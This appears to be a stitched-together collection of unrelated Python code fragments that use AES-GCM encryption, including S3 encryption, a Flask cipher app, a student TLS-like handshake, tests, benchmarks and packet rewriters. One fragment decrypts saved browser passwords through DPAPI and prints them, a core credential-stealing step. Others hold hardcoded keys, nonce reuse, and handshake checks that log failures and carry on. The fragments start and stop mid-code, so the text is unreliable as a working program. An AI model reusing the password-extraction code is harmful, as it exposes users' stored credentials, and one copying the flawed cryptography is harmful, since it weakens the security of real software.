raise Exception("Usage: %s <secret-type> <secret-group> <secret-name>" % sys.argv[0]) secret_type, secret_group, secret_name = sys.argv[1:4] secret = sys.stdin.buffer.read()[:-1] print("Setting secret %s-%s-%s to %s" % (secret_type, secret_group, secret_name, secret)) bus = dbus.SystemBus() ctrl_proxy = bus.get_object("com.github.puiterwijk.dbus_parsec", "/com/github/puiterwijk/DBusPARSEC/Control") ctrl = dbus.Interface(ctrl_proxy, "com.github.puiterwijk.DBusPARSEC.Control") wrapkey = AESGCM.generate_key(256) print("Wrapper key sha256: %s" % hashlib.sha256(wrapkey).hexdigest()) encryptor = AESGCM(wrapkey) nonce = os.urandom(12) aad = '%s;%s;%s' % (secret_type, secret_group, secret_name) ct = encryptor.encrypt(nonce, secret, aad.encode("utf-8")) pubkey = ctrl.GetPublicKey(secret_type, secret_group, byte_arrays=True) print("Public key sha256: %s" % hashlib.sha256(pubkey).hexdigest()) pubkey = load_der_public_key(pubkey, default_backend()) wrapped = pubkey.encrypt( nonce + wrapkey, OAEP(mgf=MGF1(SHA256()), algorithm=SHA256(), label=None)) ctrl.StoreSecret(secret_type, secret_group, secret_name, wrapped, ct) print("Secret stored")
async def _decrypt_v2(self, file_data: bytes, metadata: Dict[str, str], entire_file_length: int, range_start: Optional[int] = None, desired_start: Optional[int] = None, desired_end: Optional[int] = None) -> bytes: decryption_key = base64.b64decode(metadata['x-amz-key-v2']) material_description = json.loads(metadata['x-amz-matdesc']) aes_key = await self._crypto_context.get_decryption_aes_key( decryption_key, material_description) # x-amz-key-v2 - Contains base64 encrypted key # x-amz-iv - AES IVs # x-amz-matdesc - JSON Description of client-side master key (used as encryption context as is) # x-amz-unencrypted-content-length - Unencrypted content length # x-amz-wrap-alg - Key wrapping algo, either AESWrap, RSA/ECB/OAEPWithSHA-256AndMGF1Padding or KMS # x-amz-cek-alg - AES/GCM/NoPadding or AES/CBC/PKCS5Padding # x-amz-tag-len - AEAD Tag length in bits iv = base64.b64decode(metadata['x-amz-iv']) # TODO look at doing AES as stream if metadata.get('x-amz-cek-alg', 'AES/CBC/PKCS5Padding') == 'AES/GCM/NoPadding': # AES/GCM/NoPadding # So begin the nastyness if range_start is not None: # Generate IV's as if you were doing so for each block until we get to the one we need iv = _adjust_iv_for_range(iv, range_start) # IV is now 16 bytes not 12 aesctr = Cipher(AES(aes_key), CTR(iv), backend=self._backend).decryptor() result = await self._loop.run_in_executor( None, lambda: (aesctr.update(file_data) + aesctr.finalize())) # Possible remove AEAD tag if our range covers the end aead_tag_len = int(metadata['x-amz-tag-len']) // 8 max_offset = entire_file_length - aead_tag_len - 1 desired_end = max_offset if desired_end > max_offset else desired_end # Chop file result = result[desired_start:desired_end] else: aesgcm = AESGCM(aes_key) try: result = await self._loop.run_in_executor( None, lambda: aesgcm.decrypt(iv, file_data, None)) except InvalidTag: raise DecryptError( 'Failed to decrypt, AEAD tag is incorrect. Possible key or IV are incorrect' ) else: if range_start: raise DecryptError('Cannot decrypt AES-CBC file with range') # AES/CBC/PKCS5Padding aescbc = Cipher(AES(aes_key), CBC(iv), backend=self._backend).decryptor() padded_result = await self._loop.run_in_executor( None, lambda: (aescbc.update(file_data) + aescbc.finalize())) unpadder = PKCS7(AES.block_size).unpadder() result = await self._loop.run_in_executor( None, lambda: (unpadder.update(padded_result) + unpadder.finalize())) return result
def tcp_echo_client(loop=None): if loop is None: loop = asyncio.get_event_loop() reader, writer = yield from asyncio.open_connection('127.0.0.1', 8888, loop=loop) key = AESGCM.generate_key(bit_length=128) #Receber os parametros p = yield from reader.read(3000) g = yield from reader.read(3000) pn = dh.DHParameterNumbers(int(p.decode()), int(g.decode())) parameters = pn.parameters(default_backend()) private_key = parameters.generate_private_key() #Receber a public key dele public_key2 = yield from reader.read(3000) partner_pk = load_pem_public_key(public_key2, default_backend()) public_key = private_key.public_key() public_bytes = public_key.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo) writer.write(public_bytes) yield from writer.drain() #Fazer load do p12 p12 = crypto.load_pkcs12(open("Cliente.p12", 'rb').read(), "1234") assinatura = assinar(public_bytes, public_key2, p12) writer.write(assinatura) yield from writer.drain() certificate = p12.get_certificate() cert_pem = crypto.dump_certificate(crypto.FILETYPE_PEM, certificate) writer.write(cert_pem) yield from writer.drain() shared_key = private_key.exchange(partner_pk) assinatura_partner = yield from reader.read(256) certificate_part = yield from reader.read(3000) certificate_part = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_part) if(len(assinatura_partner)!=0): if(verify_chain_of_trust(certificate_part)==True): res = verificar(assinatura_partner,public_bytes, public_key2, certificate_part) if res == 0: writer.write(b"") yield from writer.drain() else: data = b'S' #Gerar a chave aesgcm = AESGCM(shared_key[:32]) client = Client("Cliente 1", aesgcm) msg = client.initmsg() while len(data)>0: if msg: msg = b'M' + msg writer.write(msg) if msg[:1] == b'E': break data = yield from reader.read(100) if len(data)>0 : msg = client.respond(data[1:]) else: break else: break writer.write(b'E') print('Socket closed!') writer.close()
def AES_enc(): if request.method == 'POST': # check if the post request has the file part if 'key_name' not in request.files: flash('No file part') return redirect(request.url) if 'IV_name' not in request.files: flash('No IV part') return redirect(request.url) if 'input_name' not in request.files: flash('No plain text part') return redirect(request.url) plain_text = request.files['input_name'] key = request.files['key_name'] IV = request.files['IV_name'] mode = request.form['ModeSelector'] adata = None if 'adata' in request.files: adata = request.files['adata'] cipher_file_name = request.form[ 'output_name'] + '.bin' if not request.form[ 'output_name'] == '' else 'AES_' + mode + '_cipher_text.bin' if plain_text.filename == '': flash('No selected plain text file') return redirect(request.url) if key.filename == '': flash('No selected key file') return redirect(request.url) if IV.filename == '': flash('No selected IV file') return redirect(request.url) plain_text_buf = plain_text.read() key_buf = key.read() IV_buf = IV.read() if (mode != 'GCM'): cipher = Cipher(algorithms.AES(key_buf), AES_DIC[mode](IV_buf), backend=default_backend()) encryptor = cipher.encryptor() ct = encryptor.update(plain_text_buf) + encryptor.finalize() else: aesgcm = AESGCM(key_buf) ct = aesgcm.encrypt(IV_buf, plain_text_buf, adata.read() if adata != None else None) with open(cipher_file_name, 'wb') as ct_file: ct_file.write(ct) ct_path = shutil.move(ct_file.name, folders['Archive'] + ct_file.name) result = send_file(ct_path, as_attachment=True, attachment_filename=cipher_file_name) return result return render_template('AESEnc.html')
def data_received(self, buffer): self.deserializer.update(buffer) for pkt in self.deserializer.nextPackets(): if isinstance(pkt, ErrorPacket): print("Receive an ErrorPacket from autograder!{}".format( pkt.message)) return if pkt.DEFINITION_IDENTIFIER == "crap.handshakepacket": logger.debug( "***{} CRAP: Received a TLS handshakepacket***".format( self._mode)) if self._mode == "server": root_CA_cert = open( '/home/student_20194/.playground/connectors/crap/20194_root.cert', 'rb').read() team5_CA_cert = open( '/home/student_20194/.playground/connectors/crap/team5_signed.cert', 'rb').read() team5_CA_private_key = open( '/home/student_20194/.playground/connectors/crap/private_key.pem', 'rb').read() self.team5_CA_sign_pvk = load_pem_private_key( team5_CA_private_key, password=None, backend=default_backend()) self.root_CA_cert = x509.load_pem_x509_certificate( root_CA_cert, default_backend()) self.team5_CA_cert = x509.load_pem_x509_certificate( team5_CA_cert, default_backend()) self.team5_CA_sign_pbk = self.team5_CA_sign_pvk.public_key( ) self.root_CA_sign_pbk = self.root_CA_cert.public_key() if pkt.status == 0: client_certification = x509.load_pem_x509_certificate( pkt.cert, default_backend()) Upper_certification = x509.load_pem_x509_certificate( pkt.certChain[0], default_backend()) lower_certification = x509.load_pem_x509_certificate( pkt.certChain[-1], default_backend()) if (Upper_certification.issuer != self.root_CA_cert.issuer): print( "Upper_cert is not signed by a trusted root CA!" ) return lower_commonname = lower_certification.subject.get_attributes_for_oid( NameOID.COMMON_NAME)[0].value client_commonname = client_certification.subject.get_attributes_for_oid( NameOID.COMMON_NAME)[0].value print(lower_commonname) print(client_commonname) try: self.root_CA_sign_pbk.verify( Upper_certification.signature, Upper_certification.tbs_certificate_bytes, padding.PKCS1v15(), hashes.SHA256()) lower_certification.public_key().verify( client_certification.signature, client_certification.tbs_certificate_bytes, padding.PKCS1v15(), hashes.SHA256()) except Exception as error: logger.debug("certification chain verify failed") error_packet = HandshakePacket(status=2) self.transport.write(error_packet.__serialize__()) self.transport.close() return with open( '/home/student_20194/20194NetworkSecurity/src/bankstart/src/logfile.txt', 'a+') as f: f.write( str(time.asctime(time.localtime(time.time())))) f.write(' issuer:') f.write(str(lower_commonname)) f.write(' certification belongs to:') f.write(str(client_commonname)) f.write(' connector:') f.write( str( self.transport.get_extra_info('peername') [0])) f.write('\n') if lower_commonname[0:6] != client_commonname[0:6]: logger.debug( "client certification is not signed by a trust lower_CA according to the rules!" ) error_packet = HandshakePacket(status=2) self.transport.write(error_packet.__serialize__()) self.transport.close() return print(self.transport.get_extra_info('peername')) if client_commonname != self.transport.get_extra_info( 'peername')[0]: logger.debug( "client common name check failed because this is a wrong common name" ) error_packet = HandshakePacket(status=2) self.transport.write(error_packet.__serialize__()) self.transport.close() return self.cert_pubkA = client_certification.public_key() try: self.cert_pubkA.verify( pkt.signature, pkt.pk, padding.PSS( mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH), hashes.SHA256()) except Exception as error: logger.debug( "Server verify fails because DH public_key signature does not match" ) tls_handshake_packet = HandshakePacket(status=2) self.transport.write( tls_handshake_packet.__serialize__()) self.transport.close() logger.debug("Server verify cert success") self.server_private_key = ec.generate_private_key( ec.SECP384R1(), default_backend()) self.server_public_key = self.server_private_key.public_key( ) self.server_sign_pvk = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend()) self.server_sign_pbk = self.server_sign_pvk.public_key( ) self.snonce = randrange(255) self.serialized_snonce = str( self.snonce).encode('ASCII') self.serialized_cnonce = str(pkt.nonce).encode('ASCII') #generate shared_key recv_pbk = load_pem_public_key( pkt.pk, backend=default_backend()) self.shared_key = self.server_private_key.exchange( ec.ECDH(), recv_pbk) data = self.server_public_key.public_bytes( Encoding.PEM, PublicFormat.SubjectPublicKeyInfo) sigB = self.server_sign_pvk.sign( data, padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH), hashes.SHA256()) tls_handshake_packet = HandshakePacket(status=1) tls_handshake_packet.pk = data tls_handshake_packet.signature = sigB tls_handshake_packet.nonce = self.snonce builder = x509.CertificateBuilder() builder = builder.subject_name( x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, u'20194.5.20.30'), ])) builder = builder.issuer_name( self.team5_CA_cert.subject) builder = builder.not_valid_before( datetime.datetime.today() - (datetime.timedelta(days=90))) builder = builder.not_valid_after( datetime.datetime.today() + (datetime.timedelta(days=90))) builder = builder.serial_number( x509.random_serial_number()) builder = builder.public_key(self.server_sign_pbk) builder = builder.add_extension( x509.SubjectAlternativeName( [x509.DNSName(u"20194.5.20.30")]), critical=False) certificate = builder.sign( private_key=self.team5_CA_sign_pvk, algorithm=hashes.SHA256(), backend=default_backend()) server_cert = certificate.public_bytes(Encoding.PEM) print("Server get signed cert success!!!") tls_handshake_packet.cert = server_cert tls_handshake_packet.certChain = [team5_CA_cert] cnonceSignature = self.server_sign_pvk.sign( self.serialized_cnonce, padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH), hashes.SHA256()) tls_handshake_packet.nonceSignature = cnonceSignature self.transport.write( tls_handshake_packet.__serialize__()) logger.debug("Server send TLS handshake!") elif pkt.status == 1: try: self.cert_pubkA.verify( pkt.nonceSignature, self.serialized_snonce, padding.PSS( mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH), hashes.SHA256()) except Exception as error: logger.debug( "server signature verify wrong: nonce") tls_handshake_packet = HandshakePacket(status=2) self.transport.write( tls_handshake_packet.__serialize__()) self.transport.close() print("Server TLS Handshake complete") # Create hash 1, IVA, IVB digest1 = hashes.Hash(hashes.SHA256(), backend=default_backend()) digest1.update(self.shared_key) hash1 = digest1.finalize() self.ivA = hash1[0:12] self.ivB = hash1[12:24] print("server iva:", self.ivA) print("server ivb:", self.ivB) # Create hash2, encA digest2 = hashes.Hash(hashes.SHA256(), backend=default_backend()) digest2.update(hash1) hash2 = digest2.finalize() self.decB = hash2[0:16] print("server dec:", self.decB) # Create hash3, decA digest3 = hashes.Hash(hashes.SHA256(), backend=default_backend()) digest3.update(hash2) hash3 = digest3.finalize() self.encB = hash3[0:16] print("server enc:", self.encB) self.higherProtocol().connection_made( self.crap_transport) elif self._mode == "client" and pkt.status == 1: server_certification = x509.load_pem_x509_certificate( pkt.cert, default_backend()) Upper_certification = x509.load_pem_x509_certificate( pkt.certChain[0], default_backend()) # ToDo certification integrity verify and common name verify if (Upper_certification.issuer != self.root_CA_cert.issuer): # Upper_certification.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value print("Upper_cert is not signed by a trusted root CA!") return self.cert_pubkB = server_certification.public_key() try: self.cert_pubkB.verify( pkt.signature, pkt.pk, padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH), hashes.SHA256()) except Exception as error: logger.debug( "client signature verify wrong: ECDH public key") tls_handshake_packet = HandshakePacket(status=2) self.transport.write( tls_handshake_packet.__serialize__()) self.transport.close() try: self.cert_pubkB.verify( pkt.nonceSignature, self.serialized_cnonce, padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH), hashes.SHA256()) except Exception as error: logger.debug("client signature verify wrong: nonce") tls_handshake_packet = HandshakePacket(status=2) self.transport.write( tls_handshake_packet.__serialize__()) self.transport.close() self.serialized_snonce = str(pkt.nonce).encode('ASCII') snonceSignature = self.client_sign_pvk.sign( self.serialized_snonce, padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH), hashes.SHA256()) tls_handshake_packet = HandshakePacket( status=1, nonceSignature=snonceSignature) self.transport.write(tls_handshake_packet.__serialize__()) # Generate shared key recv_pubk = load_pem_public_key(pkt.pk, backend=default_backend()) self.shared_key = self.client_private_key.exchange( ec.ECDH(), recv_pubk) print("Client TLS Handshake complete") # Create hash 1, IVA, IVB digest1 = hashes.Hash(hashes.SHA256(), backend=default_backend()) digest1.update(self.shared_key) hash1 = digest1.finalize() self.ivA = hash1[0:12] self.ivB = hash1[12:24] print("client iva:", self.ivA) print("client ivb:", self.ivB) # Create hash2, encA digest2 = hashes.Hash(hashes.SHA256(), backend=default_backend()) digest2.update(hash1) hash2 = digest2.finalize() self.encA = hash2[0:16] print("client enc:", self.encA) # Create hash3, decA digest3 = hashes.Hash(hashes.SHA256(), backend=default_backend()) digest3.update(hash2) hash3 = digest3.finalize() self.decA = hash3[0:16] print("client dec:", self.decA) self.higherProtocol().connection_made(self.crap_transport) if pkt.DEFINITION_IDENTIFIER == "crap.datapacket": if self._mode == "server": aesgcm = AESGCM(self.decB) try: decData = aesgcm.decrypt(self.ivA, pkt.data, None) except Exception as error: logger.debug("Server Decryption failed") self.ivA = (int.from_bytes(self.ivA, "big") + 1).to_bytes( 12, "big") self.higherProtocol().data_received(decData) if self._mode == "client": aesgcm = AESGCM(self.decA) try: decData = aesgcm.decrypt(self.ivB, pkt.data, None) except Exception as error: logger.debug("Client Decryption failed") self.ivB = (int.from_bytes(self.ivB, "big") + 1).to_bytes( 12, "big") self.higherProtocol().data_received(decData)
def encrypt(self, plaintext): aesgcm = AESGCM(self.key) nonce = os.urandom(16) ciphertext = aesgcm.encrypt(nonce, plaintext.encode('utf-8'), None) return base64.b64encode(nonce + ciphertext).decode('utf-8')
def __init__(self, key, IV, auth_data): super().__init__(key, IV) self.cipher = AESGCM(self.key) self.auth_data = str.encode(auth_data,'utf-8')
def enc_aesgcm(key, msg, auth): cipher = AESGCM(key) nonce = os.urandom(16) ciphertext = cipher.encrypt(nonce, msg, auth) return (ciphertext, nonce)
def new_cipher(self, subkey: bytes): return AESGCM(subkey)
#!/usr/bin/env python # -*- coding: utf-8 -*- from cryptography.hazmat.primitives.ciphers.aead import AESGCM import os import binascii plaintext = b'HelloCUCPlaintextIsVeryGoooooooooood' aad = b"authenticated but unencrypted data" print('AAD - ' + str(aad)) key = AESGCM.generate_key(bit_length=256) print('KEY - ' + str(binascii.hexlify(key))) aesgcm = AESGCM(key) nonce = os.urandom(12) print('NONCE - ' + str(binascii.hexlify(nonce))) ct = aesgcm.encrypt(nonce, plaintext, aad) print(ct) print(binascii.hexlify(ct)) decrypted = aesgcm.decrypt(nonce, ct, aad) print(decrypted)
from cryptography.hazmat.primitives.ciphers.aead import AESGCM import os import struct import requests # The Key needs to be reversed # The solution has this key in secret.key key = "" with open("secret.key", "rb") as f: key = f.read() # The request for a flag is uint32_t(0) # AEAD is used, so flipping a cyphertext bit won't work # Context aesgcmctx = AESGCM(key) # Payload and IV payload = struct.pack("I", 0) iv = os.urandom(16) # Encrypt and append cyphertext = iv + aesgcmctx.encrypt(iv, payload, None) # Get the flag cryptflag = requests.post("http://127.0.0.1:8080/c2", data=cyphertext).content # Decrypt it! cfiv = cryptflag[:16] cfdata = cryptflag[16:] print("Got: {}".format(aesgcmctx.decrypt(cfiv, cfdata, None).decode()))
def test_decrypt(self): adapter = adapters.aes_gcm(key_bits=256, nonce_bits=96) key = b'<key>'.ljust(32, b'\x00') nonce = os.urandom(12) ciphertext = AESGCM(key).encrypt(nonce, b'<some data>', None) assert adapter.decrypt(nonce + ciphertext, key) == b'<some data>'
def test_encrypt(self): adapter = adapters.aes_gcm(key_bits=256, nonce_bits=96) key = b'<key>'.ljust(32, b'\x00') return_value = adapter.encrypt(b'<some data>', key) ciphertext = AESGCM(key).encrypt(return_value[:12], b'<some data>', None) assert return_value[12:] == ciphertext
def __init_cipher(self): scrypt = Scrypt(self.salt, length=32, n=2**14, r=8, p=1) key = scrypt.derive(bytes(self.password, encoding='utf8')) cipher = AESGCM(key) return cipher
def deAES(data, key, nonce, entype="AES_GCM", associated_data=None): if entype == "AES_GCM": aesgcm = AESGCM(key) return aesgcm.decrypt(nonce, data, associated_data) else: raise InvalidUsageException(10006)
if not encrypted_password.startswith(v10_prefix): # Appel à DPAPI si commence par 'v10' (avant version 80) decrypted_password = win32crypt.CryptUnprotectData( encrypted_password, None, None, None, 0)[1] else: # Nouvelle méthode AESGCM-256 # Récupère et déchiffre la clé with open(browser_choice[x][2]) as f: d = json.load(f) encrypted_key = base64.decodebytes( bytes(d['os_crypt']['encrypted_key'], 'utf-8'))[len(DPAPI_prefix):] key = win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1] # Récupère la nonce de 12 bytes en l'isolant nonce = encrypted_password[len(v10_prefix):nonce_size + len(v10_prefix)] # Isole le cipher en retirant le préfixe raw_cipher = encrypted_password[len(v10_prefix) + nonce_size:] # Construit AEAD avec la clé récupérée dans le PrefService déchiffrée préalablement cryptor = AESGCM(key) # Déchiffre le mot de passe decrypted_password = cryptor.decrypt(nonce, raw_cipher, b"") print(" * Mot de passe: {}".format( decrypted_password.decode('utf-8')))
from cryptography.hazmat.primitives.ciphers.aead import AESGCM from cryptography.hazmat.backends import default_backend import os backend=default_backend() nonce=os.urandom(12) message_to_encrypt=b"Hello World, Happy New Year!!" additional_message=b"Not Secret" key=AESGCM.generate_key(bit_length=256) aes_gcm=AESGCM(key) encrypt_message=aes_gcm.encrypt(nonce, message_to_encrypt, additional_message) assert message_to_encrypt,aes_gcm.decrypt(nonce, encrypt_message, additional_message) print(aes_gcm.decrypt(nonce, encrypt_message, additional_message).decode())
def aesgcm_decrypt(data: bytes, key: bytes, nonce: bytes): aesgcm = AESGCM(key) return aesgcm.decrypt(nonce, data, None)
def setEngines(self): self.encEngine = AESGCM(self.server_write) self.decEngine = AESGCM(self.server_read)
def aesgcm_encrypt(data: bytes, key: bytes): nonce = os.urandom(16) aesgcm = AESGCM(key) return (aesgcm.encrypt(nonce, data, None), nonce)
from cryptography.hazmat.primitives.ciphers.aead import AESGCM from netfilterqueue import NetfilterQueue import dpkt import random import socket import struct key = b'\xef\x20\x0b\xdd\x60\x65\x4e\x48\xc4\x3d\x1d\x19\x9f\x3f\x79\x23\x4f\xdb\xe2\x8e\xfb\x54\xa7\xe9\x88\x71\x47\xed\xbf\xce\x01\x20' keybc = AESGCM(key) sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Inform the Operating System that the script crafts the IP header itself sockfd.setsockopt(socket.IPPROTO_IPV6, socket.IP_HDRINCL, True) def modify(packet): pkt = dpkt.ip6.IP6(packet.get_payload()) if is_icmp_neighbour_message(pkt): packet.accept() return noncebc = random.randint(0, 4294967295) noncebcp = random.randint(0, 4294967295) encrypted_payload = keybc.encrypt(bytes(noncebcp), bytes(pkt.data), '') encrypted_payload_signature = encrypted_payload[-16:] encrypted_payload = encrypted_payload[:-16] header_sb = pkt.all_extension_headers[0].data[2:-87]
from cryptography.hazmat.primitives.ciphers.aead import AESGCM from netfilterqueue import NetfilterQueue import dpkt import socket import struct key = b'7\x98\xc1\xdf\x7f}\xea5?\\6\x17\tlT\xed\xa2a\x0fn\x87.(\x0c\xe4;*4\xda\x8fY\xc8' keycs = AESGCM(key) key = b'\xef\x20\x0b\xdd\x60\x65\x4e\x48\xc4\x3d\x1d\x19\x9f\x3f\x79\x23\x4f\xdb\xe2\x8e\xfb\x54\xa7\xe9\x88\x71\x47\xed\xbf\xce\x01\x20' keycb = AESGCM(key) sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Inform the Operating System that the script crafts the IP header itself sockfd.setsockopt(socket.IPPROTO_IPV6, socket.IP_HDRINCL, True) def modify(packet): pkt = dpkt.ip6.IP6(packet.get_payload()) client_ip = "2100::102" pkt.src = socket.inet_pton(socket.AF_INET6, client_ip) dst_ip = "2100::101" pkt.dst = socket.inet_pton(socket.AF_INET6, dst_ip) ci = struct.unpack(">I", pkt.all_extension_headers[0].data[2:6])[0] nonce = struct.unpack(">I", pkt.all_extension_headers[0].data[6:10])[0] noncep = struct.unpack(">I", pkt.all_extension_headers[0].data[10:14])[0]
def AES_dec(): if request.method == 'POST': # check if the post request has the file part if 'key_name' not in request.files: flash('No file part') return redirect(request.url) if 'IV_name' not in request.files: flash('No IV part') return redirect(request.url) if 'input_name' not in request.files: flash('No cipher text part') return redirect(request.url) cipher_text = request.files['input_name'] key = request.files['key_name'] IV = request.files['IV_name'] mode = request.form['ModeSelector'] adata = None if 'adata' in request.files: adata = request.files['adata'] plain_file_name = request.form[ 'output_name'] + '.bin' if not request.form[ 'output_name'] == '' else 'AES_' + mode + '_plain_text.bin' if cipher_text.filename == '': flash('No selected cipher text file') return redirect(request.url) if key.filename == '': flash('No selected key file') return redirect(request.url) if IV.filename == '': flash('No selected IV file') return redirect(request.url) cipher_text_buf = cipher_text.read() key_buf = key.read() IV_buf = IV.read() if (mode != 'GCM'): cipher = Cipher(algorithms.AES(key_buf), AES_DIC[mode](IV_buf), backend=default_backend()) decryptor = cipher.decryptor() pt = decryptor.update(cipher_text_buf) + decryptor.finalize() else: aesgcm = AESGCM(key_buf) try: pt = aesgcm.decrypt(IV_buf, cipher_text_buf, adata.read() if adata != None else None) except InvalidTag: flash('AES GCM authentication tag failed') return redirect(request.url) with open(plain_file_name, 'wb') as pt_file: pt_file.write(pt) pt_path = shutil.move(pt_file.name, folders['Archive'] + pt_file.name) result = send_file(pt_path, as_attachment=True, attachment_filename=plain_file_name) return result return render_template('AESDec.html')
def _privatebin_encrypt(paste_passphrase, paste_password, paste_plaintext, paste_formatter, paste_attachment_name, paste_attachment, paste_compress, paste_burn, paste_opendicussion): if paste_password: paste_passphrase += bytes(paste_password, 'utf-8') # PBKDF # kdf_salt = get_random_bytes(8) kdf_salt = bytes(os.urandom(8)) kdf_iterations = 100000 kdf_keysize = 256 # size of resulting kdf_key backend = default_backend() kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=int(kdf_keysize / 8), # 256bit salt=kdf_salt, iterations=kdf_iterations, backend=backend) kdf_key = kdf.derive(paste_passphrase) # AES-GCM adata_size = 128 # cipher_iv = get_random_bytes(int(adata_size / 8)) cipher_iv = bytes(os.urandom(int(adata_size / 8))) cipher_algo = "aes" cipher_mode = "gcm" compression_type = "none" if paste_compress: compression_type = "zlib" # compress plaintext paste_data = {'paste': paste_plaintext} if paste_attachment_name and paste_attachment: paste_data['attachment'] = paste_attachment paste_data['attachment_name'] = paste_attachment_name if paste_compress: zobj = zlib.compressobj(wbits=-zlib.MAX_WBITS) paste_blob = zobj.compress(_json_encode(paste_data)) + zobj.flush() else: paste_blob = _json_encode(paste_data) # Associated data to authenticate paste_adata = [ [ base64.b64encode(cipher_iv).decode("utf-8"), base64.b64encode(kdf_salt).decode("utf-8"), kdf_iterations, kdf_keysize, adata_size, cipher_algo, cipher_mode, compression_type, ], paste_formatter, int(paste_opendicussion), int(paste_burn), ] paste_adata_json = _json_encode(paste_adata) aesgcm = AESGCM(kdf_key) ciphertext = aesgcm.encrypt(cipher_iv, paste_blob, paste_adata_json) # Validate # aesgcm.decrypt(cipher_iv, ciphertext, paste_adata_json) paste_ciphertext = base64.b64encode(ciphertext).decode("utf-8") return paste_adata, paste_ciphertext
def enc_data_send(self, enc, iv, data): aesgcm = AESGCM(enc) encData = aesgcm.encrypt(iv, data, None) new_packet = DataPacket(data=encData) self.transport.write(new_packet.__serialize__()) print("{} send encrypted data".format(self.mode))
def decrypt_string(key, data): nonce, cipherbytes = data[3:15], data[15:] aesgcm = AESGCM(key) plainbytes = aesgcm.decrypt(nonce, cipherbytes, None) plaintext = plainbytes.decode('utf-8') return plaintext
async def put_object(self, Body: Union[bytes, IO], Bucket: str, Key: str, Metadata: Dict = None, **kwargs): """ PutObject. Takes same args as Boto3 documentation Encrypts files :param: Body: File data :param Bucket: S3 Bucket :param Key: S3 Key (filepath) """ if self._s3_client is None: await self.setup() if hasattr(Body, 'read'): if inspect.iscoroutinefunction(Body.read): Body = await Body.read() else: Body = Body.read() # We do some different V2 stuff if using kms is_kms = isinstance(self._crypto_context, KMSCryptoContext) # noinspection PyUnresolvedReferences authenticated_crypto = is_kms and self._crypto_context.authenticated_encryption Metadata = Metadata if Metadata is not None else {} aes_key, matdesc_metadata, key_metadata = await self._crypto_context.get_encryption_aes_key( ) if is_kms and authenticated_crypto: Metadata['x-amz-cek-alg'] = 'AES/GCM/NoPadding' Metadata['x-amz-tag-len'] = str(AES_BLOCK_SIZE) iv = os.urandom(12) # 16byte 128bit authentication tag forced aesgcm = AESGCM(aes_key) result = await self._loop.run_in_executor( None, lambda: aesgcm.encrypt(iv, Body, None)) else: if is_kms: # V1 is always AES/CBC/PKCS5Padding Metadata['x-amz-cek-alg'] = 'AES/CBC/PKCS5Padding' iv = os.urandom(16) padder = PKCS7(AES.block_size).padder() padded_result = await self._loop.run_in_executor( None, lambda: (padder.update(Body) + padder.finalize())) aescbc = Cipher(AES(aes_key), CBC(iv), backend=self._backend).encryptor() result = await self._loop.run_in_executor( None, lambda: (aescbc.update(padded_result) + aescbc.finalize())) # For all V1 and V2 Metadata['x-amz-unencrypted-content-length'] = str(len(Body)) Metadata['x-amz-iv'] = base64.b64encode(iv).decode() Metadata['x-amz-matdesc'] = json.dumps(matdesc_metadata) if is_kms: Metadata['x-amz-wrap-alg'] = 'kms' Metadata['x-amz-key-v2'] = key_metadata else: Metadata['x-amz-key'] = key_metadata await self._s3_client.put_object(Bucket=Bucket, Key=Key, Body=result, Metadata=Metadata, **kwargs)
from timeit import default_timer as timer from cryptography.hazmat.primitives.ciphers.aead import AESGCM if __name__ == '__main__': timelist = [] SAMPLES = 1000 f = open("testblock.data", "rb") datablock = f.read() print("datablock size: ", sys.getsizeof(datablock)) f.close() sym_key = os.urandom(32) nonce = os.urandom(12) for i in range(SAMPLES): start = timer() # 1x compress compressed_datablock = lzma.compress(datablock) # 1x AE aesgcm = AESGCM(sym_key) ciphertext = aesgcm.encrypt(nonce, compressed_datablock, None) end = timer() timelist.append(end - start) print("Average time in sec:", sum(timelist) / SAMPLES)